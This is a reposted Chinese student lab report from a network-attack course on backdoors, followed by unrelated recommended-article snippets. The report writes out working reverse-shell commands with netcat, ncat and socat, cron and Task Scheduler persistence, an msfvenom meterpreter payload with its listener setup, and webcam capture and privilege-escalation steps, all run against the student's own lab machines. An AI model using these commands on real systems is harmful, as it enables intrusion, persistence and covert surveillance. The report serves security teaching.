2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

最新推荐文章于 2025-09-13 11:18:57 发布
转载 最新推荐文章于 2025-09-13 11:18:57 发布 · 94 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Miss-moon/p/10585939.html
文章标签:

#操作系统 #shell #开发工具

本文介绍通过netcat与socat获取主机Shell的方法,演示了cron与任务计划程序的启动技巧,详细讲解了MSFmeterpreter生成可执行文件的过程,并探讨了摄像头、音频等敏感信息的获取与权限提升的技术。

2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

一、实践目标

  • 使用netcat获取主机操作Shell,cron启动
  • 使用socat获取主机操作Shell, 任务计划启动
  • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

二、基础知识

  • Kali地址:192.168.153.134
    1298409-20190323220705832-1487605759.png

  • Win10地址:169.254.0.178
    1298409-20190323220712041-619854888.png

  • 保证能ping通:
    1298409-20190323220718246-1385502352.png

  • 关闭防火墙和杀毒软件

三、Exp2.1 使用ncat,本机(Windows)获得虚拟机(Linux)操作shell

实验步骤:
  • win10中使用ncat监听5237端口
ncat.exe -l -p 5237
  • 在Linux输入指令
nc 192.168.153.134 -e /bin/sh

反弹连接Windows主机的 5237 端口

  • 攻击成功:Win10成功获得Kali操作shell,能够进行操作
    1298409-20190323220817624-886859788.png

  • 相同道理:在Linux中监听5237端口

  • 在Windows输入指令

ncat.exe  -e cmd.exe 192.168.153.134 5237

反弹连接Linux的5237端口

  • 攻击成功:
    1298409-20190323220853504-1073413958.png

四、Exp2.2使用netcat获取主机操作Shell,cron启动

实验原理

  • cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务类似,当安装完成操作系统后,默认会安装此服务 工具,并且会自动启动cron进程,cron进程每分钟会定期检查是否有要执行的任务,如果有要执行的任务,则自动执行该任务。

    实验步骤

  • 用 crontab -e 指令编辑定时任务,选择3
    1298409-20190323220919015-746784665.png

  • vim编辑器中用 i 改为插入模式,在最后一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 后输入 :wq! 保存并退出
    1298409-20190323220934606-797024055.png

  • 成功显示ls:
    1298409-20190323220949446-644849727.png

五、Exp2.3使用socat获取主机操作Shell, 任务计划启动

实验步骤
  • win中打开控制面板,选中管理工具->任务计划程序

  • 创建新任务,填写任务名称,新建一个触发器。
    1298409-20190323221021359-1108308412.png

  • 同时创建新操作,在操作->程序或脚本中选择 socat.exe 文件的路径,在添加参数一栏填写 tcp-listen:5237 exec:cmd.exe,pty,stderr
    1298409-20190323221044395-1496333000.png

  • 按快捷键win+L即能锁定计算机,创建的任务开始运行。

  • 此时在Linux中输入指令 socat - tcp:192.168.153.134 5237 ,发现成功获得了cmd shell,能够输入Windows的命令(这里因为当时保存截图的时候覆盖了,后来写博客才发现少了这张截图。。不过真的成功了!)

    六、Exp2.4使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    实验步骤
  • Linux中输入指令生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=5237 -f exe > 20165237.exe

1298409-20190323221235398-1442604217.png

  • 在Linux中输入指令msfconsole,进入msf命令行,msf启动监听前需要进行一些设置
use exploit/multi/handler    /*进入handler模式*/

set payload windows/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.153.134  /*设置LHOST,其中ip为Linux的ip*/

set LPORT 5237 /*设置LPORT*/

exploit /*启动监听*/

1298409-20190323221254212-289869786.png

  • 启动监听后再在win中运行后门程序,此时Linux上已经获得了Windows主机的连接,并且得到了远程控制的shell,能够输入Windows中的命令。
    1298409-20190323221312379-244145618.png

七、Exp2.5使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

实验步骤
  • 获取摄像头和录像:
webcam_snap / webcam_stream

1298409-20190323221341455-1293564530.png
1298409-20190323221411338-1926016680.png

  • 获取运行msf会话的用户名,从而查看当前会话具有的权限;提升管理员权限(此时好像已经最高权限了)
getuid

get system

1298409-20190323221433745-893851745.png

八、实验感想与问题

  • 感想:这次实验,不得不说很让我震惊。这是我第一次实际上get到后门获取信息的知识,很满足。希望以后能够更深入的学到相关理论和知识,不仅学会攻击,也要学会防范。

  • 例举你能想到的一个后门进入到你系统中的可能方式?

答:

  • 例举你知道的后门如何启动起来(win及linux)的方式?

答:在下载软件的时候,可能会有捆绑垃圾下载下来,然后修改开机的启动项,当攻击者输入命令时,本机可能会自动响应。

  • Meterpreter有哪些给你映像深刻的功能?

答:我觉得最深刻的就是录像和音频的获取(这不就是黑客监视么!!)我已经将笔记本的摄像头贴起来了。

  • 如何发现自己有系统有没有被安装后门?

答:360安全卫士或许是个很好的选择;不过如果真正想要发现后门程序,我觉得要用抓包技术来分析信息。

转载于:https://www.cnblogs.com/Miss-moon/p/10585939.html

[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
2019瓜子网后台开发笔试题目
u014077947的博客
03-31 1811
填空题: 1、有三道概率题,感觉后台开发的很喜欢考概率题呀 2、树的前序遍历、后序遍历、中序遍历 3、两道网络题目,求掩码和确认序号的 4、数据库ACID的意义是什么: 原子性(Atomicity)、一致性(Consistency)、隔离性(Isolation)、持久性(Durability) 5、二叉树的叶子节点怎么计算的 6、图的邻接矩阵最少的非空元素有多少:n个顶点的连通图,至...
创建一个简单的后门App
NOSEC2019的博客
11-20 441
在本文中,我将介绍一种在Android Studio中使用Java构建简单后门应用的方法。这个后门应用所需要的权限非常少,因此很难触发任何安全警告。请注意,我所说的这个后门应用只针对于正规渗透测试中的钓鱼攻击,请确保你的合同中允许你进行这类测试。 问题 在几年前,可以很轻易地使用metasploit来构建一个可用后门,而且它在安装时不会显示所需权限。但是,在Android版本大于4.4之后,这种...
后台管理登陆口一般都如何进入?
weixin_43666497的博客
05-16 8490
找到使用的网站源码,一般情况下网站的后台都有默认的地址: /admin(一般目录是) /cms /admin/login…asp /admin/index.asp /manage/index.asp /manage/login.asp /admin.aps /admin/php /admin/aspx /system /admin/login.aspx(看网站的网站格式) /manage/inde...
2018-2019-2 20165114《网络对抗技术Exp2 后门原理实践
weixin_30493321的博客
03-21 251
目录 一、实验准备 二、实验内容 三、基础问题回答 四、实验过程及步骤 五、实验总结体会 六、实验中遇到的问题错误。 一、实验准备 1、后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 一个相对狭义一点的后门的概念: 特指潜伏于操作系统中专门做...
2018-2019~3 20165107 《网络对抗技术Exp2 后门原理实践
weixin_30822451的博客
03-23 221
20165107 《网络对抗技术Exp2 后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机...
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践
diaominduo4849的博客
03-24 186
2018-2019-2 20165217《网络对抗技术Exp2 后门原理实践 实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机...
2018-2019-2 网络对抗技术 20165304 Exp2 后门原理实践
denglina2514的博客
03-21 444
后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或soca...
2018-2019-2网络对抗技术Exp2 后门原理实践
aide0383的博客
03-23 280
2018-2019-2网络对抗技术Exp2 后门原理实践 1. 后门原理实践实验说明及预备知识 一、实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取...
Exp2 后门原理实践 20204308李文艳
m0_61155000的博客
03-23 690
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 500
一、原理实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Exp2-后门原理实践
showmaker999的博客
04-18 602
Socat 的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。这个问题可能不是因为MSF而产生的,实践五中,在运行MSF后我发现我的pwn源文件也无权限运行了,所以我怀疑可能是MSF,也可能是下载pwn文件时导致,最终按照网上的资料(后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。
20221902 2022-2023-2网络攻防实践》第六次作业
xiannvyeye的博客
04-15 496
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
性能测试工具JvisualVM/jconsole使用
平时的经验总结,学习历程
09-12 260
port是jmx的另一个通信端口。可以不设置,启动后系统会自动随机指定端口。如果关闭了防火墙,没有网络访问策略,可以不设置。如果服务器需要开通端口访问策略此处需要配置开通策略的端口。然后在windows客户机,安装jdk目录下的bin目录下找到jvisualvm.exe或jconsole,通过远程连接方式监控jvm的cpu 内存 线程 类加载的情况。com.sun.management.jmxremote.port 是客户端连接的端口。主要介绍远程使用方式,在启动参数添加如下参数。
Linux权限
Wangshijie1015的博客
09-10 744
所以就出现了所属者这个角色,有了所属者之后,如果李四说他想看这个文件,那你就将李四添加为该文件的所属者,并赋予所属者所需的权限,这样除了拥有者和所属者有所需权限,经由李四分享给其他人后,他们都是other,没有所需权限就无法对文件进行所需操作了。原因就是在Centos下,文件在确定用户角色的时候,确认的顺序是按拥有者,所属者,other这个顺序进行确认的,这里确定了wsj是拥有者的角色,那其权限就是---,一旦角色确认下来后,权限也就确定下来了,不会因为权限被拒绝后再去确认用户是不是其他角色。
RocketMQ 高可用集群原理深度解析性能优化实践指南
qq_35716689的博客
09-13 381
本文深入解析 RocketMQ 高可用集群的原理,探讨主备选举、消息存储路由流程,并结合真实业务场景提供性能优化实践建议和丰富的代码示例,帮助开发者构建高效稳定的消息系统。
【亲测有效】解决 “Batch script contains DOS line breaks (\r\n)” 报错
最新发布
欢迎来到我的优快云个人博客主页!
09-13 193
【摘要】本文针对Linux/Slurm集群上执行脚本时出现的 DOS line breaks (\r\n) 报错问题,分析原因是WindowsLinux换行符(CRLF vs LF)不兼容,并提供了5种解决方案:1)使用dos2unix命令转换;2)通过sed/tr命令手动去除回车符;3)用Vim修改文件格式;4)在VS Code中切换换行符;5)配置Git避免CRLF问题。最后还介绍了检查脚本是否残留\r的方法,并建议统一开发环境和配置编辑器默认使用LF换行符,以彻底解决此类问题。
设计模式(C++)详解—抽象工厂模式 (Abstract Factory)(2)
weixin_42108533的博客
09-12 623
抽象工厂模式详解 抽象工厂模式是一种创建型设计模式,用于创建一系列相关或依赖对象的家族。它解决了在不指定具体类的情况下创建相互关联的产品对象的问题。 核心特点: 提供"工厂的工厂"概念,能创建整套相互关联的产品 确保创建的产品能协同工作(如苹果生态设备) 客户端代码只依赖抽象接口,具体实现解耦 适用场景: 跨平台UI组件开发 数据库访问层 游戏开发中的不同风格角色/道具 主题系统切换 优势: 产品兼容性保证 易于切换整套产品族 符合开闭原则(新增产品族无需修改代码) 扩展性特点: 纵向
Struts2-057/CVE-2018-11776漏洞分析利用
标题和描述中提到的“struts2-057-exp”和“Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)”指的是一种在Apache Struts 2框架中的远程代码执行(Remote Code Execution,简称RCE)安全漏洞。Apache ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值